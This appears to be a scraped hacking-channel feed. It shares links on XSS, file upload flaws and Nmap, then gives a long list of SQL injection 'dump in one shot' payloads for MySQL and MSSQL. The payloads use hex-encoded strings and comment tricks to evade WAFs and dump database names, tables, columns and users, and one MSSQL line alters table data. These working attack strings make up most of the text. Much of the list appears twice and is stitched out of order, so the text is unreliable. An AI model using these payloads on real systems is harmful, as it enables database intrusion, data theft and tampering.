https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
really HelpFull For Bounty Hunters :)
really HelpFull For Bounty Hunters :)
portswigger.net
Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Interactive cross-site scripting (XSS) cheat sheet for 2025, brought to you by PortSwigger. Actively maintained, and regularly updated with new vectors.
Forwarded from The Bug Bounty Hunter
Unrestricted file upload vulnerability
https://medium.com/@519udhaya/unrestricted-file-upload-vulnerability-bba4491a08da
https://medium.com/@519udhaya/unrestricted-file-upload-vulnerability-bba4491a08da
Medium
Unrestricted file upload vulnerability
Hi guys whatsup! This is Udhay an security researcher . Here im presenting my research on unrestricted file upload vulnerablities.
Long command execute with your own shortcuts by aliases in unix terminal. :)
https://linuxize.com/post/how-to-create-bash-aliases/
https://linuxize.com/post/how-to-create-bash-aliases/
Linuxize
How to Create Bash Aliases
Bash aliases are essentially shortcuts that can save you from having to remember long commands and eliminate a great deal of typing when you are working on the command line.
If you're intrested in Nmap Scanning, In EXPERT WAY! 😎 Read this
@exploithub
https://nmap.org/book/toc.html
@exploithub
https://nmap.org/book/toc.html
nmap.org
Nmap Network Scanning
Nmap Network Scanning is the official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing…
Forwarded from The Hacker News
Apple warns of an unpatched bug in the latest iOS 13 and iPadOS releases that could allow third-party keyboard apps to grant themselves “Full Access” permission — even when you deny it.
Read: https://thehackernews.com/2019/09/ios-13-keyboard-apps.html
Apple will fix in the upcoming iOS 13.2 update.
Read: https://thehackernews.com/2019/09/ios-13-keyboard-apps.html
Apple will fix in the upcoming iOS 13.2 update.
Forwarded from Reverse Engineering
IDAPython-7.x_cheatsheet_print_en.png
2.7 MB
Some Information for SQL injection Lovers & some kinda DIOS Shit's
hope you will like don't forget to share :D
======================
1. Make_set DIOS without concat,concat_ws,group_concat
=======================
make_set(3,0x3c666f6e7420636f6c6f723d7265642073697a653d353e7377656574796f772c2c,version()),make_set(6,@sweet:=database(),(select 1 from(information_schema.tables)where(table_schema=database())and@sweet:=make_set(15,@sweet,0x3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d333e,table_name,0x3c2f666f6e743e)),@sweet)
===============================
2.make_set DIOS with concat_ws
===============================
CONCAT_WS(0x3c666f6e7420636f6c6f723d7265643e,0x3c623e,0x3c666f6e7420636f6c6f723d677265656e2073697a653d353e496e6a656374656420427920436c6f7564792056697275733c62723e3c2f666f6e743e,0x3c62723e,0x55736572203a20,system_user(),0x3c62723e,0x4461746162617365203a20,schema(),0x3c62723e,0x56657273696f6e203a20,innodb_version(),0x2d,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c666f6e7420636f6c6f723d2723,rand()*100000,0x3c6c693e,table_name,column_name)),@))
==================================
3. Print name without using 'amir',hex,mysqlchar,binary,or any thing :D
==================================
concat(conv(20,10,36),conv(10,10,32),conv(28,10,36),conv(17,10,36),conv(22,10,36),conv(18,10,36),conv(27,10,36),conv(18,10,36),0x20,conv(12,10,36),conv(17,10,36),conv(14,10,36),conv(14,10,36),conv(29,10,36),conv(10,10,36),conv(17,10,36),'<br>')
===================================
4. alternative of information_schema.tables||.columns
==================================
information_schema.key_column_usage information_schema.table_constraints information_schema.Partitions
===================================
5. update injection in mssql
==========================
; update table_name set detailText=db_name() where id=22
=============================
6. XML or error base DIOS in MSSQL
============================
'Injected by Kashmiri Cheetah'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))
================================
7. Variable Method WAF DIOS
================================
@x:=concat+(0x3c703e3c623e3c693e3c666f6e7420636f6c6f723d7265643e496e6a656374656420627920536f68616d3c2f666f6e743e3c2f693e3c2f623e3c2f703e,0x3c62723e, database/*a*/(),0x3c62723e,version/*a*/(),0x3c62723e,@:=0,(select+count(*)/*!50000from*/ /*!00000information_schema*/.columns+where+table_schema=/*!00000database*/()+and@:=concat+(@,0x3c6c693e,/*!00000table_name*/,0x3a3a,/*!00000column_name*/)),@)/
=================================
8. version without version() and @@version
=================================
(select variable_value from information_schema.session_variables where variable_name like 0x76657273696f6e)
==================================
9. Count without Count function
===================================
databases:
concat( (select (@x) from (select (@x:=0),(@dbcount:=0), (select (0) from (information_schema.schemata) where (0x00) in (@x:=concat(@x,if(@dbcount:=@dbcount%2b1,0x0,0x0) ))))x), 'DB Count is : ',@dbcount)
tables:
concat( (select (@x) from (select (@x:=0),(@tblcount:=0), (select (0) from (information_schema.tables) where table_schema=database()and (0x00) in (@x:=concat(@x,if(@tblcount:=@tblcount%2b1,0x0,0x0) ))))x), 'Tables Count is : ',@tblcount)
hope you will like don't forget to share :D
======================
1. Make_set DIOS without concat,concat_ws,group_concat
=======================
make_set(3,0x3c666f6e7420636f6c6f723d7265642073697a653d353e7377656574796f772c2c,version()),make_set(6,@sweet:=database(),(select 1 from(information_schema.tables)where(table_schema=database())and@sweet:=make_set(15,@sweet,0x3c62723e3c666f6e7420636f6c6f723d626c75652073697a653d333e,table_name,0x3c2f666f6e743e)),@sweet)
===============================
2.make_set DIOS with concat_ws
===============================
CONCAT_WS(0x3c666f6e7420636f6c6f723d7265643e,0x3c623e,0x3c666f6e7420636f6c6f723d677265656e2073697a653d353e496e6a656374656420427920436c6f7564792056697275733c62723e3c2f666f6e743e,0x3c62723e,0x55736572203a20,system_user(),0x3c62723e,0x4461746162617365203a20,schema(),0x3c62723e,0x56657273696f6e203a20,innodb_version(),0x2d,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c666f6e7420636f6c6f723d2723,rand()*100000,0x3c6c693e,table_name,column_name)),@))
==================================
3. Print name without using 'amir',hex,mysqlchar,binary,or any thing :D
==================================
concat(conv(20,10,36),conv(10,10,32),conv(28,10,36),conv(17,10,36),conv(22,10,36),conv(18,10,36),conv(27,10,36),conv(18,10,36),0x20,conv(12,10,36),conv(17,10,36),conv(14,10,36),conv(14,10,36),conv(29,10,36),conv(10,10,36),conv(17,10,36),'<br>')
===================================
4. alternative of information_schema.tables||.columns
==================================
information_schema.key_column_usage information_schema.table_constraints information_schema.Partitions
===================================
5. update injection in mssql
==========================
; update table_name set detailText=db_name() where id=22
=============================
6. XML or error base DIOS in MSSQL
============================
'Injected by Kashmiri Cheetah'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))
================================
7. Variable Method WAF DIOS
================================
@x:=concat+(0x3c703e3c623e3c693e3c666f6e7420636f6c6f723d7265643e496e6a656374656420627920536f68616d3c2f666f6e743e3c2f693e3c2f623e3c2f703e,0x3c62723e, database/*a*/(),0x3c62723e,version/*a*/(),0x3c62723e,@:=0,(select+count(*)/*!50000from*/ /*!00000information_schema*/.columns+where+table_schema=/*!00000database*/()+and@:=concat+(@,0x3c6c693e,/*!00000table_name*/,0x3a3a,/*!00000column_name*/)),@)/
=================================
8. version without version() and @@version
=================================
(select variable_value from information_schema.session_variables where variable_name like 0x76657273696f6e)
==================================
9. Count without Count function
===================================
databases:
concat( (select (@x) from (select (@x:=0),(@dbcount:=0), (select (0) from (information_schema.schemata) where (0x00) in (@x:=concat(@x,if(@dbcount:=@dbcount%2b1,0x0,0x0) ))))x), 'DB Count is : ',@dbcount)
tables:
concat( (select (@x) from (select (@x:=0),(@tblcount:=0), (select (0) from (information_schema.tables) where table_schema=database()and (0x00) in (@x:=concat(@x,if(@tblcount:=@tblcount%2b1,0x0,0x0) ))))x), 'Tables Count is : ',@tblcount)
columns:
concat( (select (@x) from (select (@x:=0),(@CLMcount:=0), (select (0) from information_Schema.columns where table_schema=database()and (0x00) in (@x:=concat(@x,if(column_name,0x00,0x00),if(@CLMcount:=@CLMcount%2b1,0x0,0x0) ))))x), 'Columns Count is : ',@CLMcount)
==========================================
10. Sort tables Ascending order as per record
==========================================
a. with "COALESCE" Function
=================
concat%280x3c666f6e7420636f6c6f723d707572706c653e3c623e3c693e436865657461682048657265203a3a20,@@version,0x3c62723e,0x3c62723e,%28SELECT+GROUP_CONCAT%28table_name,0x203a3a20,COALESCE%28table_rows,0%29+order+by+COALESCE%28table_rows,0%29+ASC+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%29
======
b. with "IFNULL" function
======
concat(0x3c666f6e7420636f6c6f723d707572706c653e3c623e3c693e436865657461682048657265203a3a20,@@version,0x3c62723e,0x3c62723e,(SELECT+GROUP_CONCAT(table_name,0x203a3a20,ifnull(table_rows,0)+order+by+ifnull(table_rows,0)+ASC+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()))
========
c. with declaring variable methods
=========
concat(@x:=0x0,@oldtable:=0x0,@num:=0,benchmark((select count(*) from information_schema.tables where table_schema=database()),@x:=concat(@x,0x3c6c693e,(select concat(@num:=@num%2b1,0x2920,tbl,0x203a3a20,rows, if(@oldtable:=concat(@oldtable,0x2C,tbl),0x0,0x0)) from (select table_name as tbl,table_rows as rows from information_schema.tables where table_schema=database() order by table_rows DESC)Cheetah where FIND_IN_SET(tbl, @oldtable)=0 limit 1))),@x)
===========================================
11. Sort tables Desc order as per record
============================================
concat(@x:=0x0,@oldtable:=0x0,@num:=0,benchmark((select count(*) from information_schema.tables where table_schema=database()),@x:=concat(@x,0x3c6c693e,(select concat(@num:=@num%2b1,0x2920,tbl,0x203a3a20,rows, if(@oldtable:=concat(@oldtable,0x2C,tbl),0x0,0x0)) from (select table_name as tbl,table_rows as rows from information_schema.tables where table_schema=database() order by table_rows DESC)Cheetah where FIND_IN_SET(tbl, @oldtable)=0 limit 1))),@x)
===========================================
12. The Smallest and Simplest DIOS Ever ;)
===========================================
concat(@:=0,(select count(*)from information_schema.columns where@:=concat(@,'<p>',table_name,':',column_name)),@)
============================================
13. TWIN Injection DIOS
============================================
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)
===========================================
@exploithub
concat( (select (@x) from (select (@x:=0),(@CLMcount:=0), (select (0) from information_Schema.columns where table_schema=database()and (0x00) in (@x:=concat(@x,if(column_name,0x00,0x00),if(@CLMcount:=@CLMcount%2b1,0x0,0x0) ))))x), 'Columns Count is : ',@CLMcount)
==========================================
10. Sort tables Ascending order as per record
==========================================
a. with "COALESCE" Function
=================
concat%280x3c666f6e7420636f6c6f723d707572706c653e3c623e3c693e436865657461682048657265203a3a20,@@version,0x3c62723e,0x3c62723e,%28SELECT+GROUP_CONCAT%28table_name,0x203a3a20,COALESCE%28table_rows,0%29+order+by+COALESCE%28table_rows,0%29+ASC+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%29
======
b. with "IFNULL" function
======
concat(0x3c666f6e7420636f6c6f723d707572706c653e3c623e3c693e436865657461682048657265203a3a20,@@version,0x3c62723e,0x3c62723e,(SELECT+GROUP_CONCAT(table_name,0x203a3a20,ifnull(table_rows,0)+order+by+ifnull(table_rows,0)+ASC+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()))
========
c. with declaring variable methods
=========
concat(@x:=0x0,@oldtable:=0x0,@num:=0,benchmark((select count(*) from information_schema.tables where table_schema=database()),@x:=concat(@x,0x3c6c693e,(select concat(@num:=@num%2b1,0x2920,tbl,0x203a3a20,rows, if(@oldtable:=concat(@oldtable,0x2C,tbl),0x0,0x0)) from (select table_name as tbl,table_rows as rows from information_schema.tables where table_schema=database() order by table_rows DESC)Cheetah where FIND_IN_SET(tbl, @oldtable)=0 limit 1))),@x)
===========================================
11. Sort tables Desc order as per record
============================================
concat(@x:=0x0,@oldtable:=0x0,@num:=0,benchmark((select count(*) from information_schema.tables where table_schema=database()),@x:=concat(@x,0x3c6c693e,(select concat(@num:=@num%2b1,0x2920,tbl,0x203a3a20,rows, if(@oldtable:=concat(@oldtable,0x2C,tbl),0x0,0x0)) from (select table_name as tbl,table_rows as rows from information_schema.tables where table_schema=database() order by table_rows DESC)Cheetah where FIND_IN_SET(tbl, @oldtable)=0 limit 1))),@x)
===========================================
12. The Smallest and Simplest DIOS Ever ;)
===========================================
concat(@:=0,(select count(*)from information_schema.columns where@:=concat(@,'<p>',table_name,':',column_name)),@)
============================================
13. TWIN Injection DIOS
============================================
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)
===========================================
@exploithub